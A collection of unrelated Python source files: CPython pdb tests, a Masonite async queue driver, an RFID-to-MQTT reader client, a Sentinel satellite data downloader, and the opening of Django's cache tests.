pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env={**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue36250(self):
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn(b'Error', stdout,
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_issue26053(self):
# run command of pdb prompt echoes the correct args
script = "print('hello')"
commands = """
continue
run a b c
run d e f
quit
"""
stdout, stderr = self.run_pdb_script(script, commands)
res = '\n'.join([x.strip() for x in stdout.splitlines()])
self.assertRegex(res, "Restarting .* with arguments:\na b c")
self.assertRegex(res, "Restarting .* with arguments:\nd e f")
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn(b"NameError: name 'invalid' is not defined",
stdout)
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with support.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def test_issue42384(self):
'''When running `python foo.py` sys.path[0] is an absolute path. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with support.temp_cwd() as cwd:
expected = f'(Pdb) sys.path[0] is {os.path.realpath(cwd)}'
stdout, stderr = self.run_pdb_script(script, commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
@support.skip_unless_symlink
def test_issue42384_symlink(self):
'''When running `python foo.py` sys.path[0] resolves symlinks. `python -m pdb foo.py` should behave the same'''
script = textwrap.dedent("""
import sys
print('sys.path[0] is', sys.path[0])
""")
commands = 'c\nq'
with support.temp_cwd() as cwd:
cwd = os.path.realpath(cwd)
dir_one = os.path.join(cwd, 'dir_one')
dir_two = os.path.join(cwd, 'dir_two')
expected = f'(Pdb) sys.path[0] is {dir_one}'
os.mkdir(dir_one)
with open(os.path.join(dir_one, 'foo.py'), 'w') as f:
f.write(script)
os.mkdir(dir_two)
os.symlink(os.path.join(dir_one, 'foo.py'), os.path.join(dir_two, 'foo.py'))
stdout, stderr = self._run_pdb([os.path.join('dir_two', 'foo.py')], commands)
self.assertEqual(stdout.split('\n')[2].rstrip('\r'), expected)
def test_issue42383(self):
with support.temp_cwd() as cwd:
with open('foo.py', 'w') as f:
s = textwrap.dedent("""
print('The correct file was executed')
import os
os.chdir("subdir")
""")
f.write(s)
subdir = os.path.join(cwd, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(subdir, 'subdir'))
wrong_file = os.path.join(subdir, 'foo.py')
with open(wrong_file, 'w') as f:
f.write('print("The wrong file was executed")')
stdout, stderr = self._run_pdb(['foo.py'], 'c\nc\nq')
expected = '(Pdb) The correct file was executed'
self.assertEqual(stdout.split('\n')[6].rstrip('\r'), expected)
class ChecklineTests(unittest.TestCase):
def setUp(self):
linecache.clearcache() # Pdb.checkline() uses linecache.getline()
def tearDown(self):
support.unlink(support.TESTFN)
def test_checkline_before_debugging(self):
with open(support.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
self.assertEqual(db.checkline(support.TESTFN, 1), 1)
def test_checkline_after_reset(self):
with open(support.TESTFN, "w") as f:
f.write("print(123)")
db = pdb.Pdb()
db.reset()
self.assertEqual(db.checkline(support.TESTFN, 1), 1)
def test_checkline_is_not_executable(self):
with open(support.TESTFN, "w") as f:
# Test for comments, docstrings and empty lines
s = textwrap.dedent("""
# Comment
\"\"\" docstring \"\"\"
''' docstring '''
""")
f.write(s)
db = pdb.Pdb()
num_lines = len(s.splitlines()) + 2 # Test for EOF
for lineno in range(num_lines):
self.assertFalse(db.checkline(support.TESTFN, lineno))
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
unittest.makeSuite(ChecklineTests),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
QueueAsyncDriver.py
|
""" Async Driver Method """
import threading
from masonite.contracts.QueueContract import QueueContract
from masonite.drivers.BaseDriver import BaseDriver
class QueueAsyncDriver(QueueContract, BaseDriver):
"""Queue Aysnc Driver
"""
def __init__(self, Container):
"""Queue Async Driver
Arguments:
Container {masonite.app.App} -- The application container.
"""
self.container = Container
def push(self, *objects):
"""Push objects onto the async stack.
Arguments:
objects {*args of objects} -- One or more job objects passed as parameters to this method.
"""
for obj in objects:
obj = self.container.resolve(obj)
thread = threading.Thread(
target=obj.dispatch, args=(), kwargs={})  # pass the bound method itself so dispatch() runs inside the new thread
thread.start()
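# Hypothetical usage sketch (names below are made up for illustration, not part
# of this driver): given a queueable class with a dispatch() method, e.g.
#   class SendWelcomeEmail:
#       def dispatch(self):
#           ...  # do the work
# a call like driver.push(SendWelcomeEmail) resolves the class through the
# container and runs its dispatch() on a background thread.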
|
__main__.py
|
import argparse
import logging
import json
import time
import sys
# from threading import Thread
import paho.mqtt.client as mqtt
import rc522
import led_rgb
import utils
from __init__ import __version__, APP_NAME, HOST, PORT, LED_PINS, MQTT_TOPIC, LOG_FILE, LOG_FORMAT
def message_led(client, userdata, msg):
""" zpracovává zprávy na téma /led """
data = json.loads(msg.payload.decode('utf-8'))
try:
# check the message format
if (set(('color', 'blink')).issubset(data)):
color = led_rgb.Color(color_hex=data['color'])
if (int(data['blink']) > 0):
userdata['ledrgb'].blink(color, num=int(data['blink']))
else:
userdata['ledrgb'].switch_on(color)
except Exception as e:
logging.warning(e)
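# Sketch of the expected /led payload, inferred from message_led above (the exact
# color encoding depends on led_rgb.Color, so treat the values as hypothetical):
#   {"color": "00ff00", "blink": 3}  -> blink three times
#   {"color": "ff0000", "blink": 0}  -> switch the LED on permanently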
def on_disconnect(client, userdata, rc):
print("Disconnect to {0}:{1}".format(client._host, client._port))
logging.info("Disconnect to {0}:{1}".format(client._host, client._port))
# switch the LED off
userdata['ledrgb'].switch_off()
def on_log(client, userdata, level, string):
logging.log(level, string)
def on_message(client, userdata, msg):
logging.info('on_message', {'msg': msg})
def on_connect(client, userdata, flags, rc):
logging.info('connect', {'flags': flags, 'rc': rc})
if (rc == 0):
print("Connected to {0}:{1}".format(client._host, client._port))
logging.info("Connected to {0}:{1}".format(client._host, client._port))
# send the subscription request
client.subscribe(MQTT_TOPIC['LED'].format(client._client_id), 0)
# register the handler for messages on the /led topic
client.message_callback_add(MQTT_TOPIC['LED'].format(client._client_id), message_led)
# publish device information
data = {'serial_number': utils.serial_number(), 'version': __version__}
client.publish(MQTT_TOPIC['INFO'].format(client._client_id), json.dumps(data))
def parse_args():
parser = argparse.ArgumentParser(prog=APP_NAME, description='Reader RFID is client BPINI')
parser.add_argument('-v', '--version', action='version', version="%(prog)s (version {0})".format(__version__))
parser.add_argument('-d', '--debug', dest='debug', action='store_true', default=False, help='Debug mode')
parser.add_argument('-H', '--host', dest="host", default=HOST,
help="MQTT host to connect to [default: %(default)d]")
parser.add_argument('-p', '--port', dest="port", type=int, default=PORT,
help="Port for remote MQTT host [default: %(default)d]")
return parser.parse_args()
# def send_info(client):
# while not client.is_stop:
# time.sleep(1.5)
# data = {'serial_number': utils.serial_number(), 'version': __version__}
# client.publish(MQTT_TOPIC['INFO'].format(client._client_id), json.dumps(data))
def main():
args = parse_args()
log_level = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(filename=LOG_FILE, level=log_level, format=LOG_FORMAT)
# build the client ID
client_id = '{0}/{1}'.format(APP_NAME, utils.device_id())
ledrgb = led_rgb.LedRGB(LED_PINS['RED'], LED_PINS['GREEN'], LED_PINS['BLUE'])
rfid = rc522.RFID()
print("---- BPINI - READER RFID ----")
print("Client ID: {0}".format(client_id))
logging.info("Client ID: {0}".format(client_id))
# create the MQTT client
client = mqtt.Client(client_id)
client.on_message = on_message
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_log = on_log
client.user_data_set({'ledrgb': ledrgb})
# keep retrying the connection until it succeeds
while True:
try:
time.sleep(2)
client.connect(args.host, args.port, 60)
client.loop_start()
break
except Exception as e:
print(e)
logging.warning(e)
except KeyboardInterrupt:
rfid.cleanup()
sys.exit(0)
# client.is_stop=False
# t = Thread(target=send_info, args=(client,))
# t.start()
while (True):
try:
# read the tag UID
uid = rfid.read_uid()
if (uid is not None):
# convert the UID to a hex string
uid_hex = ''.join('{0:02x}'.format(uid[x]) for x in range(4))
logging.info("Read TAG UID: {0}".format(uid_hex))
# publish a message with the UID
infot = client.publish(MQTT_TOPIC['TAG'].format(client._client_id), json.dumps({'uid': uid_hex}))
infot.wait_for_publish()
except KeyboardInterrupt:
# client.is_stop=True
# t.join()
client.loop_stop()
client.disconnect()
rfid.cleanup()
break
if __name__ == "__main__":
main()
|
data_download.py
|
import numpy as np
import binascii
import os
import multiprocessing
import wget
import zipfile
import requests
def download_sentinel_data(product_identifier, output_location, verbose=1, timeout=10*60, debug=False):
"""
Download and unzip a tile with satelite data.
Args:
product_identifier (string): Product identifier
output_location (string): Location of where to put unzip output data
verbose (int): Print progress (verbose==1)
timeout (int): seconds before the wget download is killed. On timeout the download is restarted, up to 5 attempts in total (see n_retries below)
debug (bool): run on main thread if set to True (timeout is ignored)
Returns:
string: Path to SAFE-folder
"""
tmp_zip_file = os.path.join(output_location, str(os.getpid()) + '_' + binascii.hexlify(os.urandom(16)).decode() + '_tmp.zip')
safe_file = os.path.join(output_location, product_identifier+'.SAFE')
if verbose:
print('Downloading', product_identifier,get_eocloud_url(product_identifier))
# Download
# We need to do this async as it sometimes freezes
def _download(n_retries=0):
try:
wget.download(get_eocloud_url(product_identifier), out=tmp_zip_file, bar=wget.bar_thermometer if verbose else None)
except Exception as e:
if n_retries:
_download(n_retries-1)
else:
raise e
n_retries = 5
if not debug:
i = 0
completed = False
while i < n_retries and not completed:
i += 1
p = multiprocessing.Process(target=_download, daemon=True)
p.start()
p.join(timeout=timeout)
if p.is_alive():
p.terminate()
p.join()
print('Retrying download.', n_retries - i, 'retries left.')
continue
completed = True
if not completed:
raise TimeoutError('Download timed out {} times.'.format(n_retries))
else:
_download(n_retries)
if verbose:
print('\n')
if not os.path.isdir(output_location):
if verbose:
print('Making directory:', output_location)
os.makedirs(output_location)
if verbose:
print('Unzipping', product_identifier)
with zipfile.ZipFile(tmp_zip_file) as f:
f.extractall(safe_file)
os.remove(tmp_zip_file)
return safe_file
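# Hypothetical usage sketch (the output path is made up for illustration; the
# identifier is the example used in get_eocloud_url's docstring below):
#   safe_dir = download_sentinel_data(
#       'S2B_MSIL1C_20180516T072619_N0206_R049_T37LCJ_20180516T102848',
#       '/data/sentinel', verbose=1)
# downloads the zip, unpacks it and returns the path to the .SAFE folder.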
def get_eocloud_url(product_identifier):
"""
Returns a URL to the SAFE-file on eocloud.eu, given a product identifier
Args:
product_identifier (string): product identifier given by ESA (eg. S2B_MSIL1C_20180516T072619_N0206_R049_T37LCJ_20180516T102848)
.. Todo:: maybe double check that the base URL is working for all cases
.. Todo:: write tests
Returns:
string: URL to the SAFE-file on eocloud.eu
"""
tile = parse_product_identifier(product_identifier)
product_level = tile['product_level']
year = tile['datetime'].astype(object).year
month = tile['datetime'].astype(object).month
day = tile['datetime'].astype(object).day
return "http://185.48.233.249/Sentinel-2/MSI/{}/{}/{:02d}/{:02d}/{}.SAFE".format(product_level, year, month, day, product_identifier)
def download_file_from_google_drive(google_drive_id, destination):
"""
download files from google drive
Args:
google_drive_id (string): for example, given the url:
https://drive.google.com/uc?id=1YZp2PUR1NYKPlBIVoVRO0Tg1ECDmrnC3&export=download,
the id is 1YZp2PUR1NYKPlBIVoVRO0Tg1ECDmrnC3
destination (string): output file
"""
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params = { 'id' : google_drive_id}, stream = True)
token = get_confirm_token(response)
if token:
params = { 'id' : google_drive_id, 'confirm' : token}
response = session.get(URL, params = params, stream = True)
save_response_content(response, destination)
def parse_product_identifier(product_identifier):
"""
Parse the product identifier
Args:
product_identifier (string): product identifier
Returns:
dict: parsed name components
"""
# Remove extension
product_identifier = product_identifier.split('.')[0]
# Add product_identifier
out = {'product_identifier': product_identifier}
# Split name into different parts
name_parts = product_identifier.split('_')
# Figure out which sentinel (1, 2, or 3)
out['sentinel_type'] = int(name_parts[0][1])
if out['sentinel_type'] == 2:
"""
Sentinel 2: (after 6th of December, 2016)
MMM_MSIL1C_YYYYMMDDHHMMSS_Nxxyy_ROOO_Txxxxx_<Product Discriminator>.SAFE
The products contain two dates.
The first date (YYYYMMDDHHMMSS) is the datatake sensing time.
The second date is the "<Product Discriminator>" field, which is 15 characters in length, and is used to distinguish between different end user products from the same datatake. Depending on the instance, the time in this field can be earlier or slightly later than the datatake sensing time.
The other components of the filename are:
MMM: is the mission ID(S2A/S2B)
MSIL1C: denotes the Level-1C product level
YYYYMMDDHHMMSS: the datatake sensing start time
Nxxyy: the Processing Baseline number (e.g. N0204)
ROOO: Relative Orbit number (R001 - R143)
Txxxxx: Tile Number field
SAFE: Product Format (Standard Archive Format for Europe)"""
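# Worked example (illustrative), using the identifier quoted in
# get_eocloud_url's docstring:
# 'S2B_MSIL1C_20180516T072619_N0206_R049_T37LCJ_20180516T102848' splits into
# ['S2B', 'MSIL1C', '20180516T072619', 'N0206', 'R049', 'T37LCJ',
#  '20180516T102848'], i.e. mission 'S2B', level 'L1C', sensing time
# 2018-05-16T07:26:19, baseline 206, relative orbit 49, tile 'T37LCJ' and
# product discriminator 2018-05-16T10:28:48.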
out['product_discriminator'] = _sentinel_datetime_2_np_datetime(name_parts[6])
# We only support the new format
# TODO: add support for older sentinel-2 name formats
if out['product_discriminator'] <= np.datetime64('2016-12-06T00:00:00'):
raise NotImplementedError('parse_product_identifier() does not support sentinel-2 data earlier than 6th of December 2016')
out['misson_id'] = name_parts[0]
out['product_level'] = name_parts[1][3:]
out['datetime'] = _sentinel_datetime_2_np_datetime(name_parts[2])
out['processing_baseline_number'] = int(name_parts[3][1:])
out['relative_orbit_number'] = int(name_parts[4][1:])
out['tile_id'] = name_parts[5]
elif out['sentinel_type'] == 1:
""" https://sentinel.esa.int/web/sentinel/user-guides/sentinel-1-sar/naming-conventions """
out['misson_id'] = name_parts[0]
out['mode'] = name_parts[1]
out['product_type'] = name_parts[2][0:3]
out['resolution_class'] = name_parts[2][-1]
out['processing_level'] = int(name_parts[3][0])
out['product_class'] = name_parts[3][1]
out['polarization'] = name_parts[3][2:]
out['datetime'] = _sentinel_datetime_2_np_datetime(name_parts[4])
out['start_date'] = _sentinel_datetime_2_np_datetime(name_parts[4])
out['end_date'] = _sentinel_datetime_2_np_datetime(name_parts[5])
out['absolute_orbit_number'] = int(name_parts[6][1:])
out['mission_data_take_id'] = name_parts[7]
out['product_unique_id'] = name_parts[8]
elif out['sentinel_type'] == 3:
# TODO: add support for sentinel 3 name formats
raise NotImplementedError('parse_product_identifier() does not support sentinel-3 yet')
return out
def _sentinel_datetime_2_np_datetime(sentinel_datetime_string):
date, time = sentinel_datetime_string.split('T')
year = date[0:4]
month = date[4:6]
day = date[6:8]
hour = time[0:2]
min = time[2:4]
sec = time[4:6]
np_datetime_str = year + '-' + month + '-' + day + 'T' + hour + ':' + min + ':' + sec
return np.datetime64(np_datetime_str)
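# Example (illustrative):
# _sentinel_datetime_2_np_datetime('20180516T072619') returns
# np.datetime64('2018-05-16T07:26:19').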
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core import signals
from django.core.cache import (cache, caches, CacheKeyWarning,
InvalidCacheBackendError, DEFAULT_CACHE_ALIAS, get_cache,
close_caches)
from django.core.context_processors import csrf
from django.db import connection, connections, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.signals import setting_changed
from django.test.utils import IgnoreDeprecationWarningsMixin
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
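# Illustrative example (not part of the original test module): with
# base={'BACKEND': 'x'} and params={'TIMEOUT': 30}, the 'v2' entry becomes
# {'BACKEND': 'x', 'VERSION': 2, 'TIMEOUT': 30}; params override
# _caches_setting_base, which overrides base.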
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
